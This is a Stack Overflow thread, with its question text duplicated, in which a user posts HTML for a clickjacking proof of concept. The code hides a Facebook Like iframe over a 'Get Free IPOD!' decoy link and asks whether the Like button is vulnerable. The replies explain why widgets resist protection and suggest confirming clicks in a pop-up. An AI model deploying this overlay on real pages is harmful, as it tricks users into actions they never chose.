Few days before I have read regarding clickjacking attack from . So today I tried with facebook like button. and It seems that i am successful in the experiment.
But i am not sure weather i am correct or not? This is the code snippet I have used.
<html>
<head>
<script>
window.fbAsyncInit = function() {
FB.init({
appId : '********',
xfbml : true,
version : 'v2.1'
});
};
(function(d, s, id){
var js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) {return;}
js = d.createElement(s); js.id = id;
js.src = "//connect.facebook/en_US/sdk.js";
fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));
</script>
<style>
iframe { /* iframe from facebook */
width:140px;
height:100px;
margin-top: 100px;
margin-left: 50px;
position:absolute;
top:0; left:0;
filter:alpha(opacity=50); /* in real life opacity=0 */
opacity:0.5;
}
.a{
margin-top: 95px;
}
</style>
</head>
<body>
<div class="a">
<a href="" target="_blank" style="position:relative;left:20px;z-index:-1">Get Free IPOD!</a>
</div>
<iframe src="//www.facebook/plugins/like.php?href=https%3A%2F%2Fwww.facebook%2FTimesnow&width&layout=button&action=like&show_faces=false&share=false&height=35&appId=*****" scrolling="no" frameborder="0" style="border:none; overflow:hidden; height:35px;" allowTransparency="true"></iframe>
</body>
</html>
I can set the opacity of the iframe to 0 so that user can not see the fb like button when the user will click on the link , the attacker page will be automatically liked.
Example Fiddle: /
Am I missing something? or facebook like button is really vulnerable ?
Few days before I have read regarding clickjacking attack from http://javascript.info/tutorial/clickjacking . So today I tried with facebook like button. and It seems that i am successful in the experiment.
But i am not sure weather i am correct or not? This is the code snippet I have used.
<html>
<head>
<script>
window.fbAsyncInit = function() {
FB.init({
appId : '********',
xfbml : true,
version : 'v2.1'
});
};
(function(d, s, id){
var js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) {return;}
js = d.createElement(s); js.id = id;
js.src = "//connect.facebook/en_US/sdk.js";
fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));
</script>
<style>
iframe { /* iframe from facebook. */
width:140px;
height:100px;
margin-top: 100px;
margin-left: 50px;
position:absolute;
top:0; left:0;
filter:alpha(opacity=50); /* in real life opacity=0 */
opacity:0.5;
}
.a{
margin-top: 95px;
}
</style>
</head>
<body>
<div class="a">
<a href="http://www.google." target="_blank" style="position:relative;left:20px;z-index:-1">Get Free IPOD!</a>
</div>
<iframe src="//www.facebook./plugins/like.php?href=https%3A%2F%2Fwww.facebook.%2FTimesnow&width&layout=button&action=like&show_faces=false&share=false&height=35&appId=*****" scrolling="no" frameborder="0" style="border:none; overflow:hidden; height:35px;" allowTransparency="true"></iframe>
</body>
</html>
I can set the opacity of the iframe to 0 so that user can not see the fb like button when the user will click on the link , the attacker page will be automatically liked.
Example Fiddle: http://jsfiddle/5e5kvxk4/2/
Am I missing something? or facebook like button is really vulnerable ?
Share Improve this question edited Sep 24, 2014 at 14:41 user3427540 asked Sep 24, 2014 at 13:59 user3427540user3427540 1,1721 gold badge16 silver badges33 bronze badges 5- Yep it is. That's why a install a plugin on my browser that prevents facebook buttons from working offsite. Anyways, what's your question? – Dave Chen Commented Sep 24, 2014 at 14:33
- Well, how could this be prevented without disallowing any embedded buttons? – Bergi Commented Sep 24, 2014 at 14:35
- @DaveChen: I am surprised that facebook is vulnerable. thats what I was asking, facebook does not take any prevention measures for this? – user3427540 Commented Sep 24, 2014 at 14:39
- It does violate their policies, but I can see how it would be difficult to prevent. Note that like buttons should work offsite, so detecting if they are obstructed in view would be impossible for facebook to do. – Dave Chen Commented Sep 24, 2014 at 14:50
- This issue is not specific to the FB like button in any way. And rest assured that Facebook is taking all measures against this that they possibly can – but in this situation, there is not much that can be done without breaking the intended functionality. (The counter-measures the page you linked to simply don’t apply here – the Like button is inside an iframe on purpose, so any kind of “frame breaking” would not make any sense whatsoever here in the first place.) – C3roe Commented Sep 25, 2014 at 12:05
1 Answer
Reset to default 6Yes, it probably is vulnerable to click jacking. There isn't a good solution to protect widgets from forged requests using current web technologies.
The widget will either be vulnerable to clickjacking or CSRF as explained here:
From "How to protect widgets from forged requests":
You don't want this [widget] to be vulnerable to CSRF so you write an iframe to the page. Based on the origin inheritance rules the parent site won't be able to read the CSRF token. However what about clickjacking (or likejacking )? Because of CSRF you must be within an iframe and there for the x-frame-options cannot help, and the same holds true for frame-busters
The best solution at present appears to be employing a pop up window in order to validate the click:
Clicking on the widget needs to open a pop-up window containing a new page -- an iframe is not good enough, it must be a new window -- which is entirely under the control of your web application. Confirm the action, whatever it is, on that page.
Yes, this is somewhat inelegant, but the present Web security architecture doesn't give you any better options.